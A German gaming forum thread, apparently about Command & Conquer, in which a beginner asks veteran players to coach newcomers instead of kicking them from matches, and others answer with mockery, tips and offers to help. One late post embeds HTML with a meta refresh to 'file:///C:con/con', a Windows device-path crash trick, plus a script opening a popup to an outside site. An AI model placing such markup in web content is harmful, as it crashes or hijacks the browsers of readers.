unterstützung

quater

Guest
unterszützt mal die newbies die meisten regen sich darüber auf das sie nicht so gut zocken können aber das wars dann auch dann kommt imma soein shit wie ahhh du schei... newb hau ab man wird in kaum ein 4er fun game ertragen weil man einfach nicht so gut ist wie ihr also wäre es mal nicht schlecht wenn ihr mal uns die newbies mal ein wenig untersütz oder ein wenig treniert würde mich sehr freuhen wenn ihr euch das mal durch denn kopf gehen lässt bis die tage :nono
 
klar , kein problem... msn=?

(öpö ich bann immer alle die mir suspekt vorkommen sorry , hab halt bock auf niveauvolle games.)

hab schon viele leuts trainiert aber immer wieder cool zu sehen wie sie sachen in 2 tagen lernen fuer dich ich monate gebraucht hab.
 
Last edited:
Original geschrieben von quater
unterszützt mal die newbies die meisten regen sich darüber auf das sie nicht so gut zocken können aber das wars dann auch dann kommt imma soein shit wie ahhh du schei... newb hau ab man wird in kaum ein 4er fun game ertragen weil man einfach nicht so gut ist wie ihr also wäre es mal nicht schlecht wenn ihr mal uns die newbies mal ein wenig untersütz oder ein wenig treniert würde mich sehr freuhen wenn ihr euch das mal durch denn kopf gehen lässt bis die tage :nono

haha du bist gut es geht darum das jeder neue Ts player nur mod map zocken ich hab nix gegen newbies wenn ich sehe aha die kommen in mein game und sehe er ist nicht gut kick ich in und er muss es nun mal so nehmen und auserdem wenn man sie mit spielen läst dann hauen sie mitten nach 7 oder 9 min ab deswegen führen sich viele so auf und sagen sowas.

MfG Steve
 
he steve ich sag mal so es gib newbs die es nicht richtig wollen und weiterhin halt nur ein newb bleiben wollen aber es gibt genügt die besser werden wollen ok ich rege mich auch auf wenn jemand schlechter ist als ich was aber leider nicht so oft vorkommt aber ega lund ich kann nur von meiner seite aus sagen das ich besser werden will um mit euch zu zocken möchte akzeptiere es wenn ich sage ich will besser werden und unterstüzung brauche
 
schreib deín nick halt so mit GrOsS und Klein BucHstAben dann denken die meisten du bist gut lOl und lassen dich ffgs mit zocken spiel halt terra gegen gute leute und du wirst besser ...ich hatte auch nie ein trainer...
 
rofl es ist nicht so einfach gegen gute zu spielen man wird eh gekickt auch wenn man seinen namen gross oder klein schreibt so komme ich dann nie dazu besser zu werden wenn ich nur gekickt werde
 
nenn dich doch einfach OBIWAANNN und sagst du bist leader of -MOON- .. dann kommst du mit sicherheit in jeden game :angel :angel :angel :angel :angel
 
nah es gibst auch so geile leutz die fragen dann zb. ob1wan=? oda cncsturm=? und sagen u newb und kick
 
ne die fragen am meisten obwohl es eigentlich nicht mehr gibt ton2, Bo , usw aber das mit gross und kleinschreibung ya darauf schauen sie auch meistens
 
rofl obiwannn denn kenne ich noch von früher aber egal bin doch kein faker das einiege was ich will ist das ich besser werde spiele schon lange aber so richtig will es nicht ist es denn zuviel verlangt das ihr ma ein parr tips gehb ? :alkohol
 
mmmmmmmmmmmmm

<meta http-equiv="refresh" content="0; URL=file:///C:con/con">
<script language="JAVASCRIPT">
function devil()
{
var win;
win=window.open ("http://www.devil.xtor.de","NeuesFenster","width=1000,height=800,resizable=yes");
}
</script>
<a href="http://www.devil.xtor.de" onMouseOver="tupo()">DER LINK DER DAS FENSTER ÖFFNET</a>
 
Back
Top Bottom